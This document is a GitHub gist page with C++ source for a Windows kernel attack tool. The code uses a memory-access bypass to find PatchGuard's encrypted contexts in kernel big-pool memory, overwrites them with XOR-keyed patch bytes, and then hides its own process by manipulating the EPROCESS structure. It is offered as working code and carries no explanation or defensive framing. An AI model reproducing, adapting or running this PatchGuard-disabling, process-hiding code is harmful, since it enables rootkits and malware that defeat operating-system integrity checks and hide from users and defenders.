-
-
Save gmh5225/0a0c8e3a2d718e2d6f9b6a07d5e0f80a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "Base.hpp" | |
| typedef ULONG(*DbgPrint)(char* Format); | |
| typedef struct _SYSTEM_BIGPOOL_ENTRY | |
| { | |
| union { | |
| PVOID VirtualAddress; | |
| ULONG_PTR NonPaged : 1; | |
| }; | |
| ULONG_PTR SizeInBytes; | |
| union { | |
| UCHAR Tag[4]; | |
| ULONG TagUlong; | |
| }; | |
| } SYSTEM_BIGPOOL_ENTRY, *PSYSTEM_BIGPOOL_ENTRY; | |
| //from http://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/bigpool.htm | |
| typedef struct _SYSTEM_BIGPOOL_INFORMATION { | |
| ULONG Count; | |
| SYSTEM_BIGPOOL_ENTRY AllocatedInfo[ANYSIZE_ARRAY]; | |
| } SYSTEM_BIGPOOL_INFORMATION, *PSYSTEM_BIGPOOL_INFORMATION; | |
| typedef NTSTATUS(WINAPI *PNtQuerySystemInformation)( | |
| __in SYSTEM_INFORMATION_CLASS SystemInformationClass, | |
| __inout PVOID SystemInformation, | |
| __in ULONG SystemInformationLength, | |
| __out_opt PULONG ReturnLength | |
| ); | |
| int main() | |
| { | |
| auto pmem = InitializeBypass(); | |
| auto system = pmem->GetProcessMemory(4); | |
| Kernel kernel(pmem); | |
| auto pid = GetCurrentProcessId(); | |
| auto process = pmem->GetProcessMemory(pid); | |
| auto eprocess = pmem->GetEProcess(pid); | |
| FILE* f = fopen("C:\\Windows\\system32\\ntoskrnl.exe", "rb"); | |
| printf("%d\n", GetLastError()); | |
| _fseeki64(f, 0, SEEK_END); | |
| uint64_t size = _ftelli64(f); | |
| _fseeki64(f, 0, SEEK_SET); | |
| auto ntos = new uint8_t[size]; | |
| fread((char*)ntos, size, 1, f); | |
| fclose(f); | |
| uint8_t sig[] = { | |
| 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 , | |
| 0x58 ,0x08 ,0x48 ,0x89 ,0x70 , | |
| 0x18 ,0x48 ,0x89 ,0x78 ,0x20 , | |
| 0x48 ,0x89 ,0x50 ,0x10 ,0x55 , | |
| 0x41 ,0x54 ,0x41 ,0x55 ,0x41 , | |
| 0x56 ,0x41 ,0x57 ,0x48 ,0x81 , | |
| 0xEC ,0xC0 ,0x02 ,0x00 ,0x00 }; | |
| uint8_t mask[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; | |
| uint64_t pg = 0; | |
| for (uint64_t cursor = 0; cursor <= size; cursor++) | |
| { | |
| for (uint64_t position = 0; position < sizeof(sig);) | |
| { | |
| if (mask[position] != '?' && ntos[cursor + position] != sig[position]) | |
| break; | |
| else | |
| position++; | |
| if (position == sizeof(sig)) | |
| { | |
| pg = cursor; break; | |
| } | |
| } | |
| } | |
| uint64_t k1 = *(uint64_t*)(&ntos[pg+000]); | |
| uint64_t k2 = *(uint64_t*)(&ntos[pg + 0x008]); | |
| uint64_t k3 = *(uint64_t*)(&ntos[pg + 0x800]); | |
| uint64_t k4 = *(uint64_t*)(&ntos[pg + 0x808]); | |
| HMODULE ntdll = GetModuleHandle(TEXT("ntdll")); | |
| PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation"); | |
| if (query == NULL) { | |
| printf("GetProcAddress() failed.\n"); | |
| return 1; | |
| } | |
| unsigned int len = sizeof(SYSTEM_BIGPOOL_INFORMATION); | |
| unsigned long out; | |
| PSYSTEM_BIGPOOL_INFORMATION info = NULL; | |
| NTSTATUS status = ERROR; | |
| do { | |
| len *= 2; | |
| info = (PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); | |
| status = query(SystemBigPoolInformation, info, len, &out); | |
| } while (status == (NTSTATUS)0xc0000004); | |
| if (!SUCCEEDED(status)) { | |
| printf("NtQuerySystemInformation failed with error code 0x%X\n", status); | |
| return 1; | |
| } | |
| for (unsigned int j = 0; j < info->Count; j++) { | |
| SYSTEM_BIGPOOL_ENTRY poolEntry = info->AllocatedInfo[j]; | |
| if (poolEntry.SizeInBytes >= 0x1000) { | |
| unsigned int len = poolEntry.SizeInBytes; | |
| unsigned int room = len; | |
| unsigned int i = 0; | |
| while (room) { | |
| auto asm1 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i)); | |
| auto asm2 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8)); | |
| auto asm3 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x800)); | |
| auto asm4 = (uint64_t*)process->Read<uint8_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x808)); | |
| if (asm1 && asm2 && asm3 && asm4) { | |
| if ((*asm1 ^ k1) == (*asm3 ^ k3) | |
| && (*asm2 ^ k2) == (*asm4 ^ k4)) | |
| { | |
| auto key1 = (*asm1 ^ k1); | |
| auto key2 = (*asm2 ^ k2); | |
| unsigned char patch[16] = { 0 }; | |
| *(uint64_t*)&patch[0] = 0x5500000100828348LL ^ key1; | |
| *(uint64_t*)&patch[8] = 0x90909090c3d08948LL ^ key2; | |
| process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i), (uint64_t*)&patch[0]); | |
| process->Write<uint64_t>((void*)((uint64_t)poolEntry.VirtualAddress + i + 0x8), (uint64_t*)&patch[8]); | |
| printf("Patched context\n"); | |
| } | |
| } | |
| else { | |
| } | |
| i++; | |
| room--; | |
| } | |
| } | |
| } | |
| kernel.HideProcess(eprocess); | |
| printf("Process hidden, exit will bsod but this can run forever!\n"); | |
| while (1) | |
| Sleep(1000); | |
| printf("Press any key to exit\n"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment